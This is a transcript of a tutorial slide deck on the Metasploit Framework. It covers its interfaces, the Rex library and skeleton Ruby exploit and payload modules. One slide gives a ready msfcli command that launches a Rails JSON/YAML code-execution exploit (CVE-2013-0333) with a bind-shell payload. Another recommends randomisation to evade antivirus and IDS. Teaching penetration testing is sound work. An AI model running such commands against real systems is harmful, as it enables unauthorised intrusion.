Pelting Rubies

Transcript

1. Pelting Rubies The Metasploit Framework Ausmarton Fernandes

2. Basics • Vulnerability • Exploit • Payload • Shellcode •

   Code-injection

3. Architecture

4. Metasploit Interfaces • msfcli ◦ command-line interface to MSF ◦

   provides options to Check, Execute, list Payloads, describe exploits ◦ useful for testing when writing an exploit • msfconsole ◦ access to virtually all options available in MSF ◦ console-based interface ◦ supports tabbed command completion, uses ruby Readline ◦ can even run external commands • meterpreter ◦ dynamically extensible payload ◦ runs in-memory

5. Ruby EXtension Library • utilities to help writing exploits •

   Rex::Arch assembly instructions on the fly with variable operands, such as immediate values, registers, and so on ◦ Rex::Arch.pack - Integer packing, big/little endian ◦ Rex::Arch.adjust - Adjusting the stack pointer ◦ Rex::Arch::X86 - Generating jmp, call, push, mov, add, and sub • Rex::Exploitation provides some common operations required by various exploits • Rex::Encoding - basic encoders

6. Ruby EXtension Library (contd.) • Rex::JobContainer - organising your exploit

   code into jobs • Rex::Logging • Rex::Sync - Sync. primitives like notify/wait • Rex::Ui - helpers for different user interfaces • Rex::Post - post-exploitation tools useful in providing a generic interface to the exploited system • Rex::Proto - support for HTTP, SMB, NTLM • Rex::Services - access via listeners to various services which can be reused across exploits • Rex::Socket - TCP, SSL, IP

7. Scanning, Sniffing, Fuzzing • Port scanning ◦ Nmap ◦ Metasploit

   scanning module • Other scanners in auxiliary/scanner ◦ auxiliary/scanner/ssh/ssh_version • Password sniffing - psnuffle • auxiliary/fuzzers • using exploits with the check() method

8. Writing an exploit • Let the framework do whatever it

   can • use the Rex protocol libs • use mixins ◦ Exploit::Remote::Tcp - RHOST, RPORT, connect() ◦ Exploit::Remote::SMB - SMBPASS, smb_login() ◦ Exploit::Remote::BruteTargets - brute_exploit(), brute force utilities • use randomizations wherever possible ◦ Rex::Text.rand_text_alpha ◦ Rex::Text.rand_text_alphanumeric ◦ Helps in AV and IDS evasion

9. Structure of an exploit class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::TCP

   def initialize super( 'Name' => 'Exploit Name', 'Payload' => {'BadChars' => “\x00”} ) register_options([ Opt::RPORT(12345) ], self.class) end def exploit connect() sock.put(payload.encoded) ... end end

10. Using the check() method def check # fetch the version

    etc. case version when "2.3.0" return Exploit::CheckCode::Vulnerable when "2.3.6" return Exploit::CheckCode::Detected else print_status('Unable to detect version'') return Exploit::CheckCode::Safe end return Exploit::CheckCode::Safe end

11. Payloads module Metasploit3 include Msf::Payload::Single include Msf::Payload::Ruby def initialize(info =

    {}) super(merge_info(info, 'Name' => 'Bind TCP', 'PayloadType' => 'ruby')) end def generate return prepends(ruby_string) end def ruby_string "" #some malicious ruby code end end

12. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0333 Vulnerability in RoR 2.3.x before 2.3.16 and 3.0.x before

    3.0.20 in the way Active Support performed the parsing of JSON requests by translating them to YAML. Exploit in metasploit provides a shell which can be used to run arbitrary commands on the compromised system. /opt/metasploit/apps/pro/msf3/modules/exploit/multi/http/r ails_json_yaml_code_exec http://www.exploit-db.com/exploits/24434/ msfcli exploit/multi/http/rails_json_yaml_code_exec RHOST=victim RPORT=3000 PAYLOAD=ruby/shell_bind_tcp E ROR JSON Vuln. (CVE-2013-0333)

13. References • Metasploit Developer's Guide http://dev.metasploit.com/redmine/projects/framework/wiki/DeveloperGuide • Metasploit Unleashed http://www.offensive-security.com/metasploit-unleashed/Main_Page

    • Rex Documentation https://dev.metasploit.com/api/Rex.html • Exploits Database http://www.exploit-db.com/